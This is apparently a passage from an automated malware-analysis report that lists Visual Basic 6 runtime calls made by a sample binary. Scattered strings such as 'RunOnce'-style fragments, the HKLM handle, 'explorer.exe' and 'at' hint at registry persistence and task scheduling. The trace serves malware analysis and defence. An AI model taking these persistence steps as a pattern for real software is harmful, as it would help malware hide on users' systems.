                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C4B7
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C4C4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040C4CD
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0040C4D6
                                                                                    • #611.MSVBVM60 ref: 0040C4E3
                                                                                    • #661.MSVBVM60(?,00407C78,00000000,40000000,00000008), ref: 0040C507
                                                                                    • #705.MSVBVM60(?,00000004), ref: 0040C513
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C51E
                                                                                    • __vbaStrMove.MSVBVM60(at ), ref: 0040C542
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040C549
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C554
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C561
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C56C
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C57A
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0040C590
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000), ref: 0040C5AE
                                                                                    • __vbaFreeVarList.MSVBVM60(00000003,00000008,?,00000008), ref: 0040C5C5
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C5E9
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00407978,0000005C), ref: 0040C62F
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040C64A
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C664
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C678
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C686
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C69A
                                                                                    • __vbaStrMove.MSVBVM60(00407CC4), ref: 0040C6CE
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 0040C6DE
                                                                                    • #690.MSVBVM60(00000000,00000000), ref: 0040C6EC
                                                                                    • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,00000000), ref: 0040C70C
                                                                                    • #537.MSVBVM60(000000A0,00000000), ref: 0040C727
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C732
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040C739
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C744
                                                                                    • __vbaStrCat.MSVBVM60(00406BFC,00000000,00000000), ref: 0040C757
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C762
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C770
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C77B
                                                                                      • Part of subcall function 004218D0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,0040C78D,00000000,00000000), ref: 004218EE
                                                                                      • Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042191B
                                                                                      • Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421927
                                                                                      • Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421933
                                                                                      • Part of subcall function 004218D0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00421942
                                                                                      • Part of subcall function 004218D0: #648.MSVBVM60(0000000A), ref: 00421961
                                                                                      • Part of subcall function 004218D0: __vbaFreeVar.MSVBVM60 ref: 00421970
                                                                                      • Part of subcall function 004218D0: __vbaI2I4.MSVBVM60(?), ref: 00421984
                                                                                      • Part of subcall function 004218D0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00421992
                                                                                      • Part of subcall function 004218D0: __vbaI2I4.MSVBVM60 ref: 004219A2
                                                                                      • Part of subcall function 004218D0: #570.MSVBVM60(00000000), ref: 004219A9
                                                                                      • Part of subcall function 004218D0: __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219B6
                                                                                      • Part of subcall function 004218D0: __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219ED
                                                                                      • Part of subcall function 004218D0: #525.MSVBVM60(00000000), ref: 004219F4
                                                                                      • Part of subcall function 004218D0: __vbaStrMove.MSVBVM60 ref: 004219FF
                                                                                      • Part of subcall function 004218D0: __vbaI2I4.MSVBVM60 ref: 00421A0F
                                                                                      • Part of subcall function 004218D0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00421A1A
                                                                                      • Part of subcall function 004218D0: __vbaI2I4.MSVBVM60 ref: 00421A2A
                                                                                      • Part of subcall function 004218D0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00421A37
                                                                                      • Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60 ref: 00421A4C
                                                                                      • Part of subcall function 004218D0: __vbaStrMove.MSVBVM60(?), ref: 00421A60
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000,00000000), ref: 0040C7A6
                                                                                    • __vbaEnd.MSVBVM60 ref: 0040C7C1
                                                                                    • #535.MSVBVM60(00000000), ref: 0040C7F1
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00407CCC), ref: 0040C81D
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C828
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000), ref: 0040C834
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C83F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C84D
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C858
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000), ref: 0040C864
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040C86F
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000), ref: 0040C88D
                                                                                    • #598.MSVBVM60(0042C0D4), ref: 0040C8AE
                                                                                    • #580.MSVBVM60(00000000,00000027), ref: 0040C908
                                                                                    • __vbaStrCopy.MSVBVM60(00000000), ref: 0040C91D
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C931
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C93F
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C953
                                                                                    • __vbaStrMove.MSVBVM60(00407CC4), ref: 0040C987
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 0040C997
                                                                                    • #690.MSVBVM60(00000000,00000000), ref: 0040C9A4
                                                                                    • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,00000000), ref: 0040C9C4
                                                                                    • #600.MSVBVM60(00004008,00000000), ref: 0040C9F1
                                                                                    • __vbaEnd.MSVBVM60 ref: 0040CA04
                                                                                      • Part of subcall function 00429E10: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CBB8,80000002,00000000,00000000), ref: 00429E2E
                                                                                      • Part of subcall function 00429E10: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E5B
                                                                                      • Part of subcall function 00429E10: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E67
                                                                                      • Part of subcall function 00429E10: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00429E76
                                                                                      • Part of subcall function 00429E10: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429E8F
                                                                                      • Part of subcall function 00429E10: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 00429E9F
                                                                                      • Part of subcall function 00429E10: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EAD
                                                                                      • Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EB6
                                                                                      • Part of subcall function 00429E10: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429ECB
                                                                                      • Part of subcall function 00429E10: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429EDB
                                                                                      • Part of subcall function 00429E10: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EE9
                                                                                      • Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EF2
                                                                                      • Part of subcall function 00429E10: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429F08
                                                                                      • Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(00429F32,?,?,?,00000000,004032B6), ref: 00429F22
                                                                                      • Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429F2B
                                                                                    • #580.MSVBVM60(00000000,00000027), ref: 0040CA1A
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA32
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CA3D
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CA57
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CA62
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CA7D
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA99
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CAA4
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CABD
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CAC8
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CAE3
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BED1
                                                                                      • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                      • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                      • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                      • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 00425A0A
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                      • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                      • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                      • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                      • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                      • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                      • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                      • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                      • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                    • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 0040C157
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040C1B9
                                                                                    • __vbaStrCat.MSVBVM60( PR,00000000,00000000), ref: 0040C1D2
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0040C1E8
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0040C1F7
                                                                                    • __vbaNew.MSVBVM60(004075DC), ref: 0040C209
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C214
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 0040C250
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040C26B
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C296
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040C2AA
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C2B7
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C2C7
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040C2DF
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 00422A8B
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?,00000000), ref: 00422AA0
                                                                                      • Part of subcall function 004228E0: __vbaStrCmp.MSVBVM60(00000000), ref: 00422AA7
                                                                                      • Part of subcall function 004228E0: __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00422ACE
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422AF4
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000004), ref: 00422B15
                                                                                      • Part of subcall function 004228E0: #618.MSVBVM60(00000000), ref: 00422B1C
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 00422B27
                                                                                      • Part of subcall function 004228E0: __vbaI4Str.MSVBVM60(00000000), ref: 00422B2E
                                                                                      • Part of subcall function 004228E0: __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00422B45
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422B78
                                                                                      • Part of subcall function 004228E0: __vbaFileClose.MSVBVM60(00000000), ref: 00422B7F
                                                                                      • Part of subcall function 004228E0: __vbaFreeStr.MSVBVM60(00422BC8), ref: 00422BB8
                                                                                      • Part of subcall function 004228E0: __vbaFreeStr.MSVBVM60 ref: 00422BC1
                                                                                    • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B52E
                                                                                      • Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                      • Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                      • Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B4C8
                                                                                      • Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                      • Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                      • Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                      • Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                    • __vbaStrCmp.MSVBVM60(00406F28,?), ref: 0040B56A
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0D4,00000000), ref: 0040B5CC
                                                                                    • __vbaStrCat.MSVBVM60( RU,00000000,00000000), ref: 0040B5E5
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B5F0
                                                                                    • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B611
                                                                                    • __vbaStrCat.MSVBVM60( RU,00000000), ref: 0040B62A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B635
                                                                                    • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B656
                                                                                    • #600.MSVBVM60(00004008,00000000,0042C0D4), ref: 0040B691
                                                                                    • __vbaEnd.MSVBVM60 ref: 0040B6A4
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BA01
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040BA15
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BA22
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BA32
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040BA4A
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B413
                                                                                      • Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                      • Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                      • Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
                                                                                      • Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                      • Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                      • Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                      • Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                      • Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                      • Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                      • Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040CB52
                                                                                    • __vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040CB7A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CB85
                                                                                    • __vbaFreeStr.MSVBVM60(00000000), ref: 0040CB94
                                                                                    • __vbaStrCopy.MSVBVM60(80000002,00000000,00000000,80000002,00000000,00000000), ref: 0040CBE5
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B2E7
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040B1D7
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0E4
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CBF9
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC06
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC16
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC2E
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CC42
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC4F
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC5F
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC77
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CC8B
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC98
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCA8
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CCC0
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CCD4
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CCE1
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCF1
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CD09
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD1B
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CD26
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040CD3B
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040CD42
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CD4D
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CD5A
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CD72
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CD8A
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD9C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CDA7
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040CDBC
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040CDC3
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CDCE
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CDDB
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CDF3
                                                                                    • __vbaStrCat.MSVBVM60(at.,00000000), ref: 0040CE0F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CE1A
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040CE28
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CE33
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CE40
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE50
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CE68
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CE7C
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CE89
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE99
                                                                                      • Part of subcall function 00411F00: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CEB3,0042C160), ref: 00411F1E
                                                                                      • Part of subcall function 00411F00: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00411F4E
                                                                                      • Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(0040CEB3,?,?,?,00000000,004032B6), ref: 00411F69
